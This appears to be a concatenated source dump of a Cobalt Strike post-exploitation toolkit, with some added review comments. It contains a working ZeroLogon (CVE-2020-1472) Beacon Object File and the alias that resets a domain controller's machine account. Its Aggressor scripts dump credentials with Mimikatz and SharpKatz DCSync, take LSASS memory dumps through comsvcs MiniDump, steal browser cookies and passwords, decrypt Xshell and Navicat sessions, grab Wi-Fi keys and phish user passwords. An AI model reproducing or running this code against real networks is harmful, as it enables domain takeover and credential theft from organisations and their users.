WINAPI OLE32$CLSIDFromString(wchar_t * lpsz, LPCLSID pclsid); 149 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoGetObject(wchar_t *, BIND_OPTS *, REFIID, void **ppv); 150 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); 151 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(wchar_t * lpsz, LPIID lpiid); 152 | 153 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaCallAuthenticationPackage(HANDLE, ULONG, PVOID, ULONG, PVOID, PULONG, PNTSTATUS); 154 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaConnectUntrusted(PHANDLE); 155 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaDeregisterLogonProcess(HANDLE); 156 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaLookupAuthenticationPackage(HANDLE, void *, PULONG); 157 | 158 | DECLSPEC_IMPORT BOOL WINAPI SHELL32$ShellExecuteExA(LPSHELLEXECUTEINFOA); 159 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/src/zerologon.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Port of SharpZeroLogon to a Beacon Object File 3 | * 
https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include "beacon.h" 10 | 11 | typedef struct _NETLOGON_CREDENTIAL { 12 | CHAR data[8]; 13 | } NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL; 14 | 15 | typedef struct _NETLOGON_AUTHENTICATOR { 16 | NETLOGON_CREDENTIAL Credential; 17 | DWORD Timestamp; 18 | } NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR; 19 | 20 | typedef enum _NETLOGON_SECURE_CHANNEL_TYPE{ 21 | NullSecureChannel = 0, 22 | MsvApSecureChannel = 1, 23 | WorkstationSecureChannel = 2, 24 | TrustedDnsDomainSecureChannel = 3, 25 | TrustedDomainSecureChannel = 4, 26 | UasServerSecureChannel = 5, 27 | ServerSecureChannel = 6, 28 | CdcServerSecureChannel = 7 29 | } NETLOGON_SECURE_CHANNEL_TYPE; 30 | 31 | typedef struct _NL_TRUST_PASSWORD { 32 | WCHAR Buffer[256]; 33 | ULONG Length; 34 | } NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD; 35 | 36 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerReqChallenge(LPWSTR PrimaryName, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientChallenge, PNETLOGON_CREDENTIAL ServerChallenge); 37 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerAuthenticate2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientCredential, PNETLOGON_CREDENTIAL ServerCredential, PULONG NegotiatedFlags); 38 | DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerPasswordSet2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_AUTHENTICATOR Authenticator, PNETLOGON_AUTHENTICATOR ReturnAuthenticator, PNL_TRUST_PASSWORD ClearNewPassword); 39 | 40 | void go(char * args, int alen) { 41 | DWORD i; 42 | NETLOGON_CREDENTIAL ClientCh = {0}; 43 | NETLOGON_CREDENTIAL ServerCh = {0}; 44 | NETLOGON_AUTHENTICATOR Auth = {0}; 45 | NETLOGON_AUTHENTICATOR AuthRet = {0}; 46 | NL_TRUST_PASSWORD NewPass = {0}; 47 | ULONG NegotiateFlags = 0x212fffff; 48 | 49 | datap parser; 50 | wchar_t * 
dc_fqdn; /* DC.corp.acme.com */ 51 | wchar_t * dc_netbios; /* DC */ 52 | wchar_t * dc_account; /* DC$ */ 53 | 54 | /* extract our arguments */ 55 | BeaconDataParse(&parser, args, alen); 56 | dc_fqdn = (wchar_t *)BeaconDataExtract(&parser, NULL); 57 | dc_netbios = (wchar_t *)BeaconDataExtract(&parser, NULL); 58 | dc_account = (wchar_t *)BeaconDataExtract(&parser, NULL); 59 | 60 | for (i = 0; i < 2000; i++) { 61 | NETAPI32$I_NetServerReqChallenge(dc_fqdn, dc_netbios, &ClientCh, &ServerCh); 62 | if ((NETAPI32$I_NetServerAuthenticate2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &ClientCh, &ServerCh, &NegotiateFlags) == 0)) { 63 | if (NETAPI32$I_NetServerPasswordSet2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &Auth, &AuthRet, &NewPass) == 0) { 64 | BeaconPrintf(CALLBACK_OUTPUT, "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync", dc_account); 65 | } 66 | else { 67 | BeaconPrintf(CALLBACK_ERROR, "Failed to set machine account pass for %S", dc_account); 68 | } 69 | 70 | return; 71 | } 72 | } 73 | 74 | BeaconPrintf(CALLBACK_ERROR, "%S is not vulnerable", dc_fqdn); 75 | } 76 | -------------------------------------------------------------------------------- /scripts/DefenderAV.cna: -------------------------------------------------------------------------------- 1 | item "清除所有RunMRU记录"{ 2 | local ('$bid') 3 | foreach $bid ($1){ 4 | bexecute_assembly($1, script_resource('/exe/CleanRunMRU.exe'), "clearall"); 5 | } 6 | } 7 | item "阻止第三方DLL注入"{ 8 | local ('$bid') 9 | foreach $bid ($1){ 10 | bblockdlls($1); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /scripts/Initial_Access.cna: -------------------------------------------------------------------------------- 1 | menu "Seatbelt"{ 2 | item "All In One"{ 3 | local ('$bid'); 4 | foreach $bid ($1){ 5 | seatbeltall($bid); 6 | } 7 | } 8 | item "RDPSessions"{ 9 | local ('$bid'); 10 | foreach $bid ($1){ 11 | 
bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'RDPSessions'); 12 | } 13 | } 14 | #多选 15 | item "谷歌|火狐浏览器记录"{ 16 | local ('$bid'); 17 | foreach $bid ($1){ 18 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'ChromiumHistory FirefoxHistory IEUrls ChromiumPresence'); 19 | } 20 | } 21 | item "GetMasterKeys"{ 22 | local ('$bid'); 23 | foreach $bid ($1){ 24 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'DpapiMasterKeys'); 25 | } 26 | } 27 | item "登录日志"{ 28 | local ('$bid'); 29 | foreach $bid ($1){ 30 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'LogonEvents'); 31 | } 32 | } 33 | item "登录Session"{ 34 | local ('$bid'); 35 | foreach $bid ($1){ 36 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'LogonSessions'); 37 | } 38 | } 39 | item "网络共享"{ 40 | local ('$bid'); 41 | foreach $bid ($1){ 42 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'NetworkShares'); 43 | } 44 | } 45 | item "OracleSQLDeveloper"{ 46 | local ('$bid'); 47 | foreach $bid ($1){ 48 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'OracleSQLDeveloper'); 49 | } 50 | } 51 | item "PuttySessions"{ 52 | local ('$bid'); 53 | foreach $bid ($1){ 54 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'PuttySessions'); 55 | } 56 | } 57 | item "TcpConnections"{ 58 | local ('$bid'); 59 | foreach $bid ($1){ 60 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'TcpConnections'); 61 | } 62 | } 63 | } 64 | 65 | #Mimikatz 66 | menu "Mimikatz"{ 67 | item "List Tokens"{ 68 | local ('$bid'); 69 | foreach $bid ($1){ 70 | bmimikatz($1, "token::list"); 71 | } 72 | } 73 | item "List Admin Tokens"{ 74 | local ('$bid'); 75 | foreach $bid ($1){ 76 | bmimikatz($1, "token::list /admin"); 77 | } 78 | } 79 | item "Domain Admin Tokens"{ 80 | local ('$bid'); 81 | foreach $bid ($1){ 82 | bmimikatz($1, "token::list /domainadmin"); 83 | } 84 | } 85 | } 86 | 87 | # 钓用户密码 88 | menu "Phishing User"{ 89 | item "pickl3"{ 90 | local('$bid'); 91 | 
foreach $bid ($1){ 92 | #dll反射加载 93 | bdllspawn($1, script_resource("/exe/pickl3_reflective_dll_x64.dll"), $1, "pickl3", 5000, false); 94 | } 95 | } 96 | item "credphisher"{ 97 | local('$bid'); 98 | foreach $bid ($1){ 99 | bexecute_assembly($1, script_resource('/exe/CredPhisher.exe'), '"Please Enter Your Password"'); 100 | } 101 | } 102 | item "锁屏"{ 103 | local('$bid'); 104 | foreach $bid ($1){ 105 | bexecute_assembly($1, script_resource('/exe/locksreen.exe')); 106 | } 107 | } 108 | 109 | } 110 | 111 | ###################### 112 | #子函数 113 | ############### 114 | sub seatbeltall{ 115 | bexecute_assembly($1, script_resource('/exe/Seatbelt.exe'), "-group=all -full"); 116 | } -------------------------------------------------------------------------------- /scripts/Lateral-Movement.cna: -------------------------------------------------------------------------------- 1 | menu "Rubeus"{ 2 | 3 | } -------------------------------------------------------------------------------- /scripts/PasswordDump.cna: -------------------------------------------------------------------------------- 1 | item "Powershell Dump"{ 2 | local ('$bid'); 3 | foreach $bid ($1){ 4 | &powershelldump($bid); 5 | } 6 | } 7 | item "GetClearPass"{ 8 | local ('$bid'); 9 | foreach $bid ($1){ 10 | # &getpass($bid); 11 | &coffee(&bid); 12 | } 13 | } 14 | item "Dump域内主机hash"{ 15 | local('$bid'); 16 | foreach $bid ($1){ 17 | sharpsecdump($bid); 18 | } 19 | } 20 | item "GetGuid"{ 21 | local('$bid'); 22 | foreach $bid ($1){ 23 | getMachineGuid($bid); 24 | } 25 | } 26 | item "提取域内组策略中的帐户凭据"{ 27 | local('$bid'); 28 | foreach $bid ($1){ 29 | bexecute_assembly($1, script_resource("/exe/Net-GPPPassword.exe"), ""); 30 | } 31 | } 32 | 33 | menu "浏览器解密" { 34 | item "360 SafeBrowsergetpass"{ 35 | $bid = $1['@']; 36 | SafeBrowsergetpass($bid); 37 | getMachineGuid($bid); 38 | } 39 | } 40 | menu "内网服务解密"{ 41 | item "Xshell一把梭"{ 42 | local('$bid'); 43 | foreach $bid ($1){ 44 | xshell($bid); 45 | } 46 | } 47 | item "Navicat"{ 
48 | local('$bid'); 49 | foreach $bid ($1){ 50 | bexecute_assembly($bid,script_resource("/exe/Xshell.exe"),"-Navicat") 51 | } 52 | } 53 | } 54 | 55 | menu "Web凭据"{ 56 | item "Cookies/History/Logins"{ 57 | local('$bid'); 58 | foreach $bid ($1){ 59 | sharpchromeall($bid); 60 | } 61 | } 62 | 63 | item "List Browser Cookies"{ 64 | local('$bid'); 65 | foreach $bid ($1){ 66 | sharpchromecookies($bid); 67 | } 68 | } 69 | 70 | item "List User's History"{ 71 | local('$bid'); 72 | foreach $bid ($1){ 73 | sharphistory($bid); 74 | } 75 | } 76 | 77 | item "List Login Passwords"{ 78 | local('$bid'); 79 | foreach $bid ($1){ 80 | sharplogins($bid); 81 | } 82 | } 83 | } 84 | 85 | menu "Mimikatz" { 86 | item "Logon Passwords"{ 87 | local('$bid'); 88 | foreach $bid ($1){ 89 | logonpasswords($bid); 90 | } 91 | } 92 | item "3389解密"{ 93 | local('$bid'); 94 | foreach $bid ($1){ 95 | rdp($bid); 96 | } 97 | } 98 | item "WDigest Credentials"{ 99 | local('$bid'); 100 | foreach $bid ($1){ 101 | wdigest($bid); 102 | } 103 | } 104 | item "Kerberos Credentials"{ 105 | local('$bid'); 106 | foreach $bid ($1){ 107 | kerberos($bid); 108 | } 109 | } 110 | item "MSV LM & NTLM Passwords"{ 111 | local('$bid'); 112 | foreach $bid ($1){ 113 | msv($bid); 114 | } 115 | } 116 | item "TsPkg Passwords"{ 117 | local('$bid'); 118 | foreach $bid ($1){ 119 | tspkg($bid); 120 | } 121 | } 122 | item "LiveSSP passwords"{ 123 | local('$bid'); 124 | foreach $bid ($1){ 125 | livessp($bid); 126 | } 127 | } 128 | item "SSP passwords"{ 129 | local('$bid'); 130 | foreach $bid ($1){ 131 | ssp($bid); 132 | } 133 | } 134 | 135 | item "Dump Trust"{ 136 | local('$bid'); 137 | foreach $bid ($1){ 138 | trust($bid); 139 | } 140 | } 141 | 142 | item "Backup Keys"{ 143 | local('$bid'); 144 | foreach $bid ($1){ 145 | backupkeys($bid); 146 | } 147 | } 148 | 149 | item "Mimikatz Tickets"{ 150 | local('$bid'); 151 | foreach $bid ($1){ 152 | tickets($bid); 153 | } 154 | } 155 | 156 | item "Mimikatz ekeys"{ 157 | local('$bid'); 158 | 
foreach $bid ($1){ 159 | ekeys($bid); 160 | } 161 | } 162 | 163 | item "Mimikatz DPAPI"{ 164 | local('$bid'); 165 | foreach $bid ($1){ 166 | dpapi($bid); 167 | } 168 | } 169 | 170 | item "Mimikatz DPAPI System Secret"{ 171 | local('$bid'); 172 | foreach $bid ($1){ 173 | dpapisystem($bid); 174 | } 175 | } 176 | 177 | item "Mimikatz Credential Manager"{ 178 | local('$bid'); 179 | foreach $bid ($1){ 180 | credman($bid); 181 | } 182 | } 183 | 184 | } 185 | 186 | ################################################# 187 | 188 | # SharpKatz 189 | 190 | ################################################# 191 | 192 | menu "SharpKatz"{ 193 | # SharpKatz Debug Privilege 194 | item "Logon Passwords"{ 195 | local('$bid'); 196 | foreach $bid ($1){ 197 | sklogonpasswords($bid); 198 | } 199 | } 200 | item "WDigest Credentials"{ 201 | local('$bid'); 202 | foreach $bid ($1){ 203 | skwdigest($bid); 204 | } 205 | } 206 | item "Kerberos Credentials"{ 207 | local('$bid'); 208 | foreach $bid ($1){ 209 | skkerberos($bid); 210 | } 211 | } 212 | item "MSV LM & NTLM Passwords"{ 213 | local('$bid'); 214 | foreach $bid ($1){ 215 | skmsv($bid); 216 | } 217 | } 218 | item "TsPkg Passwords"{ 219 | local('$bid'); 220 | foreach $bid ($1){ 221 | sktspkg($bid); 222 | } 223 | } 224 | item "SharpKatz ekeys"{ 225 | local('$bid'); 226 | foreach $bid ($1){ 227 | skekeys($bid); 228 | } 229 | } 230 | item "Credential Manager"{ 231 | local('$bid'); 232 | foreach $bid ($1){ 233 | skcredman($bid); 234 | } 235 | } 236 | item "Dump User Credential By Username"{ 237 | local('$bid'); 238 | foreach $bid ($1){ 239 | skdcsyncusername($bid); 240 | } 241 | } 242 | item "Dump User Credential By GUID"{ 243 | local('$bid'); 244 | foreach $bid ($1){ 245 | skdcsyncguid($bid); 246 | } 247 | } 248 | item "Export Entire Dataset From AD"{ 249 | local('$bid'); 250 | foreach $bid ($1){ 251 | skdcsyncdataset($bid); 252 | } 253 | } 254 | } 255 | item "Dumpert" { 256 | local('$bid'); 257 | foreach $bid ($1){ 258 | dumpert($bid); 259 | } 
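}

# Menu "MISC": $1 is the array of selected beacon ids (same pattern as the
# other items, which iterate it with foreach). The original passed $1 — the
# whole selection — to bexecute_assembly inside the loop, so N selected
# beacons were each tasked N times; task the iterated $bid instead.
menu "MISC"{
    item "Dump SysInternals AutoLogon密码"{
        local('$bid');
        foreach $bid ($1){
            bexecute_assembly($bid, script_resource('exe/DecryptAutoLogon.exe'));
        }
    }
    item "WIFI密码Dump"{
        local('$bid');
        foreach $bid ($1){
            bexecute_assembly($bid, script_resource('exe/SharpWifiGrabber.exe'));
        }
    }
}

###############################
##
## Mimikatz func
##
##############################

# Spawn clearpass.x64.dll in a sacrificial process and pass the rest of the
# alias command line to it. substr($0, 6) assumes the alias word plus the
# following space are exactly 6 characters — verify against the alias name.
sub getpass{
    local('$args');
    $args = substr($0, 6);
    bdllspawn($1, script_resource("dll/clearpass.x64.dll"), $args, "QAX", 5000, false);
}

# Spawn powerkatz_x64.dll with the fixed "coffee" argument.
sub coffee{
    bdllspawn($1, script_resource("dll/powerkatz_x64.dll"), "coffee", "QAX", 5000, false);
}

# Thin wrappers around bmimikatz: $1 is the beacon id, the second argument
# is the mimikatz command line that is run as-is.
sub logonpasswords{ bmimikatz($1, "sekurlsa::logonpasswords"); }
sub wdigest{ bmimikatz($1, "sekurlsa::wdigest"); }
sub kerberos{ bmimikatz($1, "sekurlsa::kerberos"); }
sub msv{ bmimikatz($1, "sekurlsa::msv"); }
sub tspkg{ bmimikatz($1, "sekurlsa::tspkg"); }
sub livessp{ bmimikatz($1, "sekurlsa::livessp"); }
sub ssp{ bmimikatz($1, "sekurlsa::ssp"); }
sub trust{ bmimikatz($1, "sekurlsa::trust"); }
sub backupkeys{ bmimikatz($1, "sekurlsa::backupkeys"); }
sub tickets{ bmimikatz($1, "sekurlsa::tickets"); }
sub ekeys{ bmimikatz($1, "sekurlsa::ekeys"); }
sub dpapi{ bmimikatz($1, "sekurlsa::dpapi"); }

# NOTE(review): this runs the same command as dpapi(), so the
# "Mimikatz DPAPI System Secret" menu item is a duplicate of "Mimikatz DPAPI".
# If a distinct DPAPI_SYSTEM command was intended, fix the command string here.
sub dpapisystem{ bmimikatz($1, "sekurlsa::dpapi"); }

sub credman{ bmimikatz($1, "sekurlsa::credman"); }

# NOTE(review): a sub name beginning with a digit may not tokenize as an
# identifier in Sleep — confirm this sub is actually callable before relying
# on it; renaming it would require updating every caller.
sub 3rdp{
    bmimikatz($1, "vault::cred /patch");
}

# SharpChromium wrappers: $1 is the beacon id, the last argument selects the
# SharpChromium mode.
sub sharpchromeall{
    bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "all");
}

###Grab all the Cookies
sub sharpchromecookies{
    bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "cookies");
}

###Grab History
sub sharphistory{
    bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "history");
}

###Grab Login Info
sub sharplogins{
    bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "logins");
}

# Dialog-driven SharpSecDump against a remote target.
# $1 is the beacon id. The dialog callback receives the field values in $3.
# \$bid binds the beacon at dialog-creation time; the original read a global
# $bid inside the callback, so with two dialogs open for different beacons
# both would task whichever beacon opened its dialog last.
# The password is placed on the assembly command line in clear text; it will
# appear in the team-server task log.
sub sharpsecdump{
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("SharpSecDump", %(target => "", username => "", password => "", domain => "", execmethod => "Execute-Assembly"), lambda({
        local('$cmdargs');
        $cmdargs = "-target=$3['target'] -u=$3['username'] -p=$3['password'] -d=$3['domain']";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Grabbing those MF Secrets!');
            bexecute_assembly($bid, script_resource('/exe/SharpSecDump.exe'), $cmdargs);
        }
    }, \$bid));
    dialog_description($dialog, "SharpSecDump");
    drow_text($dialog, "target", "主机名或IP:");
    drow_text($dialog, "username", "用户名:");
    drow_text($dialog, "password", "密码:");
    drow_text($dialog, "domain", "输入完整域名:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}

# Dialog that dumps a process by PID with comsvcs.dll MiniDump, writing a
# full dump to the chosen path. Default PID 1314 is a placeholder the
# operator is expected to replace. NOTE(review): dumping a protected process
# such as LSASS from here needs an elevated beacon — confirm before use.
sub powershelldump{
    local('$dialog %defaults $bid');
    $bid = $1;
    # leftover from a persistence dialog; kept because it is written to a global
    $ptype = "elevatedregistrykey";

    %defaults["pid"] = "1314";
    %defaults["path"] = "C:\\log.dump";

    $dialog = dialog("powershell dump 进程", %defaults, lambda({
        bpowershell($bid, "rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump ".$3["pid"]." ".$3["path"]. " full")
    }, \$bid, \$3)
    );
    dialog_description($dialog, "powershell dump 进程");
    drow_text($dialog, "pid", "PID: ");
    drow_text($dialog, "path", "Dump PATH: ");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}

#################################################

# SharpKatz

#################################################

# SharpKatz wrappers: $1 is the beacon id, "--Command X" selects the module.
sub sklogonpasswords{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command logonpasswords");
}

sub skwdigest{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command wdigest");
}

sub skkerberos{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command kerberos");
}

sub skmsv{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command msv");
}

sub sktspkg{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command tspkg");
}

sub skekeys{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command ekeys");
}

sub skcredman{
    bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command credman");
}

# SharpKatz DCSync for a single user. $1 is the beacon id; the dialog fields
# (username, fqdn, dc) arrive in $3. \$bid binds the beacon for the callback
# (see sharpsecdump). The dialog description previously said "Enumerate Remote
# Hosts with Seatbelt", a copy-paste error. DCSync needs replication rights on
# the domain and is a well-known detection trigger.
# NOTE(review): "/ptt" is carried over from the original; it is not an obvious
# SharpKatz dcsync option — verify it is accepted or drop it.
sub skdcsyncusername{
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("SharpKatz Dump Credential By Username", %(username => "", fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({
        local('$cmdargs');
        $cmdargs = "--Command dcsync --User $3['username'] --Domain $3['fqdn'] --DomainController $3['dc'] /ptt";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Dumping Creds...');
            bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs);
        }
    }, \$bid));
    dialog_description($dialog, "SharpKatz DCSync a single user by username");
    drow_text($dialog, "username", "Please Enter the username:");
    drow_text($dialog, "fqdn", "Please Enter the FQDN:");
    drow_text($dialog, "dc", "Please Enter the FQDN of the Domain Controller:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}

# SharpKatz DCSync for a single object selected by GUID. Same structure and
# caveats as skdcsyncusername.
sub skdcsyncguid{
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("SharpKatz Dump Credential By GUID", %(guid => "", fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({
        local('$cmdargs');
        $cmdargs = "--Command dcsync --Guid $3['guid'] --Domain $3['fqdn'] --DomainController $3['dc'] /ptt";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Dumping Creds...');
            bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs);
        }
    }, \$bid));
    dialog_description($dialog, "SharpKatz DCSync a single object by GUID");
    drow_text($dialog, "guid", "Please Enter A GUID:");
    drow_text($dialog, "fqdn", "Please Enter the FQDN:");
    drow_text($dialog, "dc", "Please Enter the FQDN of the Domain Controller:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}

# SharpKatz DCSync of the whole domain (no --User/--Guid filter). Same
# structure and caveats as skdcsyncusername; this replicates every account.
sub skdcsyncdataset{
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("SharpKatz Dump Entire Dataset From AD", %(fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({
        local('$cmdargs');
        $cmdargs = "--Command dcsync --Domain $3['fqdn'] --DomainController $3['dc'] /ptt";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Dumping Creds...');
            bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs);
        }
    }, \$bid));
    dialog_description($dialog, "SharpKatz DCSync the entire domain dataset");
    drow_text($dialog, "fqdn", "Please Enter the FQDN:");
    drow_text($dialog, "dc", "Please Enter the FQDN of the Domain Controller:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}

#################################
#Wing
############

# Dialog wrapper for Xshell.exe (session-file decryption helper). $1 is the
# beacon id; "path" and "uid" are passed through on the assembly command line.
sub xshell{
    local('$dialog %defaults $bid');
    $bid = $1;
    # leftover from a persistence dialog; kept because it is written to a global
    $ptype = "elevatedregistrykey";

    %defaults["uid"] = "1314";
    %defaults["path"] = "\"\"";

    $dialog = dialog("Xshell一把梭", %defaults, lambda({
        bexecute_assembly($bid, script_resource("/exe/Xshell.exe"), " -Xshell ".$3["path"]." ".$3["uid"])
    }, \$bid, \$3)
    );
    dialog_description($dialog, "Xshell 5,6,7一把梭");
    drow_text($dialog, "path", "Session PATH(默认为空): ");
    drow_text($dialog, "uid", "username+sid: ");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}

# Query HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid; on a non-x64 beacon
# both registry views are queried. The original compared the arch string with
# '==', which is Sleep's numeric comparison, so the x86 branch was never taken;
# 'eq' is the string comparison used elsewhere in this file. The original also
# defined this sub twice, identically; the duplicate is dropped.
sub getMachineGuid{
    local('$arch');
    $arch = barch($1);
    if ($arch eq 'x64'){
        breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
    }
    else{
        breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x86");
        breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64");
    }
}
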
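# Locate the 360 Safe Browser install path via its URL-handler registry key.
# $1 is the beacon id; the original tasked an undefined global $bid instead,
# so the command never reached the intended beacon. The output is consumed by
# the beacon_output handler below.
sub SafeBrowsergetpass {
    bshell($1, 'reg query HKEY_CLASSES_ROOT\360seURL\shell\open\command|findstr exe');
}

# popup beacon_bottom {
#     item "SafeBrowsergetpass"{
#         $bid = $1['@'];
#         SafeBrowsergetpass($bid);
#         getMachineGuid($bid);
#     }
# }

# Post-processes output from SafeBrowsergetpass / getMachineGuid.
# $1 is the beacon id, $2 the output text. This fires on every beacon's
# output, so the substring matches below are the only gate.
on beacon_output {
    local('$magicstring $magicstring2 $length $last $res $dbPath $lasta $MachineGuid $beaconHost');
    $magicstring = "360se6\\Application\\360se.exe";
    $magicstring2 = "MachineGuid";

    if ($magicstring isin $2){
        # Carve the install directory out of the reg query line, then download
        # the login-assistant DB from the default profile.
        # NOTE(review): the fixed offsets (-1, -32) assume the exact reg output
        # layout; a different install path length will produce a wrong path.
        $length = strlen($2);
        $last = lindexOf($2, ":");
        $res = substr($2, $last - 1, $length - 32);
        $dbPath = "User Data\\Default\\apps\\LoginAssis\\assis2.db";
        $res = $res . $dbPath;

        bdownload($1, $res);
        blog($1,"360 SafeBrowser DB Downloading");
    }

    if ($magicstring2 isin $2){
        # Pull the GUID that follows "MachineGuid" in the reg output and store
        # it in the credential model (password slot) against the beacon host.
        # NOTE(review): the +26 offset assumes the reg query column layout.
        $lasta = lindexOf($2, "\nMachineGuid");
        $MachineGuid = substr($2, $lasta + 26, -1);
        $beaconHost = beacon_info($1, "host");
        credential_add($empty,$MachineGuid, $empty, $empty, $beaconHost);
        blog($1,"MachineGuid Get Success");
    }
}

--------------------------------------------------------------------------------
/scripts/Privilege.cna:
--------------------------------------------------------------------------------
# NOTE(review): a bare item at file top level is not a complete script; this
# is presumably meant to be placed inside a popup block.
item "Watson快速找补丁"{
    local('$bid');
    foreach $bid ($1){
        # the original was missing the comma between the two arguments
        bexecute_assembly($bid, script_resource('/exe/Watson.exe'));
    }
}
--------------------------------------------------------------------------------
/scripts/README.md:
--------------------------------------------------------------------------------
#这个目录
--------------------------------------------------------------------------------
/scripts/bof/zerologon.cna:
--------------------------------------------------------------------------------
# zerologon [safeword] [DC.fqdn]: run the CVE-2020-1472 BOF against a DC.
# The safe-word check now runs before the BOF file is opened, so nothing is
# read from disk until the operator has acknowledged the warning.
alias zerologon {
    local('$bid $barch $fqdn $netbios $args $safew $handle $data');
    ($bid, $safew, $fqdn) = @_;
    $netbios = split("\\.", $fqdn)[0];

    # safety check.
    if ($safew ne "iunderstand") {
        berror($1, "zerologon aborted! Type help zerologon and read first.");
        return;
    }

    # figure out the arch of this session
    $barch = barch($1);

    # read in the right BOF file
    $handle = openf(script_resource("bof/zerologon. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);

    # build our arguments: DC FQDN, NetBIOS name, machine account name
    $args = bof_pack($1, "ZZZ", $fqdn, $netbios, $netbios . '$');

    # announce what we're doing
    btask($1, "Reset $netbios $+ \$ machine account via CVE-2020-1472");

    # execute it.
    beacon_inline_execute($1, $data, "go", $args);
}

beacon_command_register(
    "zerologon",
    "Reset DC machine account password with CVE-2020-1472",
    "Synopsis: zerologon [safeword] [DC.fqdn]\n\nReset the machine account password for a domain controller with the\nZerologon exploit. \n\nThis exploit will break the functionality of this domain controller.\n\c4Don't use in production.\o Use \c0iunderstand\o as the safe word parameter\nto acknowledge that you read this.");
--------------------------------------------------------------------------------
/scripts/cmd/AV.cna:
--------------------------------------------------------------------------------
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!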
